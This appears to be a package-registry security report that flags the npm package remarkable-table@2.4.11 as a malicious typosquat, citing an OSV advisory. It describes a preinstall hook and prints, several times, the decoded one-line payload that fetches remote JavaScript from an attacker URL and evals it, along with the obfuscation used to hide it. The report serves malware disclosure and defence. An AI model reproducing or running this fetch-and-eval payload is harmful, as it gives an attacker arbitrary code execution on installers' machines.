registry  /  remarkable-table  /  2.4.11

remarkable-table@2.4.11

Generate a markdown (GFM) table

AI Security Review

scanned 2h ago · by lpm-firewall-ai

Installing the package triggers a preinstall script. It downloads attacker-controlled text from a remote endpoint and evaluates it in the installer process.

Static reason
High-risk behavior combination matched malicious policy.
Trigger
`npm install remarkable-table@2.4.11`
Impact
Arbitrary code execution with the installing user's permissions; the payload can change without a package update.
Mechanism
obfuscated preinstall remote-payload fetch and eval
Attack narrative
`package.json` runs `node index.d.js` during npm preinstall. That file decodes an obfuscated JavaScript expression which fetches text from a Vercel endpoint and immediately evaluates it. The package’s normal formatter entrypoint is unrelated to this lifecycle behavior, so the install hook is a concrete remote-code-execution chain rather than package functionality.
Rationale
The package contains an unconsented preinstall hook that retrieves and executes mutable remote code. This is concrete malicious install-time behavior.
Evidence
package.jsonindex.d.jsindex.js
Network endpoints1
everydaynodechecker-39143n.vercel.app/api/key?mem=root3

OSV Corroboration

OpenSSF/OSV
Advisory
MAL-2026-10447
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in remarkable-table (npm)
Details
The package's preinstall script runs index.d.js, which reconstructs the identifier 'eval' from a character-code array ([101,118,97,108]) and base64-decodes an embedded payload that resolves to `(async()=>eval(await fetch('https://everydaynodechecker-39143n.vercel.app/api/key?mem=root3').then(r=>r.text())))();`. On `npm install`, the package performs an outbound HTTPS request to everydaynodechecker-39143n.vercel.app and passes the response body to eval, executing arbitrary attacker-controlled JavaScript on the installer's machine. Both the sink (eval) and the destination are obfuscated to evade casual review. The destination is unrelated to any legitimate table/markdown functionality, and the package name is a typosquat of the widely used `markdown-table`.

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `package.json` defines `preinstall: node index.d.js`.
  • `index.d.js` base64-decodes an async payload containing a remote fetch.
  • The decoded payload fetches `https://everydaynodechecker-39143n.vercel.app/api/key?mem=root3`.
  • The fetched response is passed directly to `eval`, enabling remote code execution at install time.
  • `index.d.js` obscures `eval` via character codes and exposes `require` on `globalThis`.
Evidence against
  • `index.js` is a local markdown-table formatter with no observed network, shell, or filesystem behavior.
  • No benign package function requires an install-time remote payload fetch or dynamic evaluation.
Behavioral surface
SourceNo risky source behavior triggered.
Supply chain
HighEntropyStringsObfuscated
ManifestNo manifest risk signals triggered.
scanned 2 file(s), 10.5 KB of source

Source & flagged code

5 flagged · loading source
package.jsonView file
scripts.preinstall = node index.d.js
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
index.d.js#virtual:base64:round1View file
1(async()=>eval(await fetch('https://everydaynodechecker-39143n.vercel.app/api/key?mem=root3').then(r=>r.text())))();
Critical
Download Execute

Source downloads or fetches remote code and executes it.

index.d.js#virtual:base64:round1View on unpkg · L1
1(async()=>eval(await fetch('https://everydaynodechecker-39143n.vercel.app/api/key?mem=root3').then(r=>r.text())))();
Critical
Remote Asset Decode Execute

Source fetches a remote non-code asset, decodes its contents, and dynamically executes the decoded payload.

index.d.js#virtual:base64:round1View on unpkg · L1
1Trigger-reachable chain: scripts.preinstall -> index.d.js L1: (async()=>eval(await fetch('https://everydaynodechecker-39143n.vercel.app/api/key?mem=root3').then(r=>r.text())))();
Critical
Trigger Reachable Dangerous Capability

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

index.d.js#virtual:base64:round1View on unpkg · L1
index.d.jsView file
4L5: const text = Buffer.from(b4, "base64").toString("utf-8"); L6: let nms = [101, 118, 97, 108]
High
Base64 Obscured Url

Source decodes a Base64-obscured HTTP endpoint at runtime.

index.d.jsView on unpkg · L4

Findings

3 Critical2 High1 Medium3 Low
CriticalDownload Executeindex.d.js#virtual:base64:round1
CriticalRemote Asset Decode Executeindex.d.js#virtual:base64:round1
CriticalTrigger Reachable Dangerous Capabilityindex.d.js#virtual:base64:round1
HighInstall Time Lifecycle Scriptspackage.json
HighBase64 Obscured Urlindex.d.js
MediumStructural Risk Force Deep Review
LowScripts Present
LowObfuscated
LowHigh Entropy Strings